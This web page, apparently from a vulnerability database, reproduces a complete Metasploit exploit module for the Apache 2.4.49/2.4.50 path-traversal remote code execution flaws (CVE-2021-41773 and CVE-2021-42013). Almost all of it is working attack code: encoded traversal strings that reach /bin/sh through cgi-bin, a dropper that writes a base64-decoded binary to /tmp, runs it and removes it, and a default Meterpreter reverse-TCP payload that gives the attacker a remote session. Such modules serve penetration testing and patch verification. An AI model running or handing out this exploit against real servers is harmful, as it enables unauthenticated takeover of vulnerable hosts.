Tuesday, October 26, 2021

Apache 2.4.49 / 2.4.50 Traversal / Remote Code Execution

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Exploit::Remote::CheckModule
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache 2.4.49/2.4.50 Traversal RCE',
'Description' => %q{
This module exploit an unauthenticated RCE vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773).
If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled,
it can be used to execute arbitrary commands (Remote Command Execution).
This vulnerability has been reintroduced in Apache 2.4.50 fix (CVE-2021-42013).
},
'References' => [
['CVE', '2021-41773'],
['CVE', '2021-42013'],
['URL', 'https://httpd.apache.org/security/vulnerabilities_24.html'],
['URL', 'https://github.com/RootUp/PersonalStuff/blob/master/http-vuln-cve-2021-41773.nse'],
['URL', 'https://github.com/projectdiscovery/nuclei-templates/blob/master/vulnerabilities/apache/apache-httpd-rce.yaml'],
['URL', 'https://github.com/projectdiscovery/nuclei-templates/commit/9384dd235ec5107f423d930ac80055f2ce2bff74'],
['URL', 'https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773/rapid7-analysis']
],
'Author' => [
'Ash Daulton', # Vulnerability discovery
'Dhiraj Mishra', # Metasploit auxiliary module
'mekhalleh (RAMELLA S├ębastien)' # Metasploit exploit module (Zeop Entreprise)
],
'DisclosureDate' => '2021-05-10',
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
'DefaultOptions' => {
'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',
'Action' => 'CHECK_RCE',
'RPORT' => 443,
'SSL' => true
},
'Targets' => [
[
'Automatic (Dropper)',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64, ARCH_X86],
'Type' => :linux_dropper,
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
'DisablePayloadHandler' => 'false'
}
}
],
[
'Unix Command (In-Memory)',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_command,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/generic',
'DisablePayloadHandler' => 'true'
}
}
],
],
'DefaultTarget' => 0,
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptEnum.new('CVE', [true, 'The vulnerability to use', 'CVE-2021-42013', ['CVE-2021-41773', 'CVE-2021-42013']]),
OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),
OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])
])
end

def cmd_unix_generic?
datastore['PAYLOAD'] == 'cmd/unix/generic'
end

def execute_command(command, _opts = {})
traversal = pick_payload * datastore['DEPTH'] << '/bin/sh'

uri = normalize_uri(datastore['TARGETURI'], traversal.to_s)
response = send_request_raw({
'method' => Rex::Text.rand_text_alpha(3..4),
'uri' => uri,
'data' => "#{Rex::Text.rand_text_alpha(1..3)}=|echo;#{command}"
})
if response && response.body
return response.body
end

false
end

def message(msg)
"#{@proto}://#{datastore['RHOST']}:#{datastore['RPORT']} - #{msg}"
end

def pick_payload
case datastore['CVE']
when 'CVE-2021-41773'
payload = '.%2e/'
when 'CVE-2021-42013'
payload = '.%%32%65/'
else
payload = ''
end

payload
end

def exploit
@proto = (ssl ? 'https' : 'http')

if (!check.eql? Exploit::CheckCode::Vulnerable) && !datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'The target is not exploitable.')
end

print_status(message("Attempt to exploit for #{datastore['CVE']}"))
case target['Type']
when :linux_dropper

file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"

print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
vprint_status(message("Generated command payload: #{cmd}"))

execute_command(cmd)

register_file_for_cleanup file_name
when :unix_command
vprint_status(message("Generated payload: #{payload.encoded}"))

if !cmd_unix_generic?
execute_command(payload.encoded)
else
received = execute_command(payload.encoded.to_s)

print_warning(message('Dumping command output in response'))
if !received
print_error(message('Empty response, no command output'))

return
end
print_line(received)
end
end
end
end
 

Copyright © 2021 Vulnerability Database | Cyber Details™

thank you Templateism for the design - You should have written the code a little more complicated - Nothing Encrypted anymore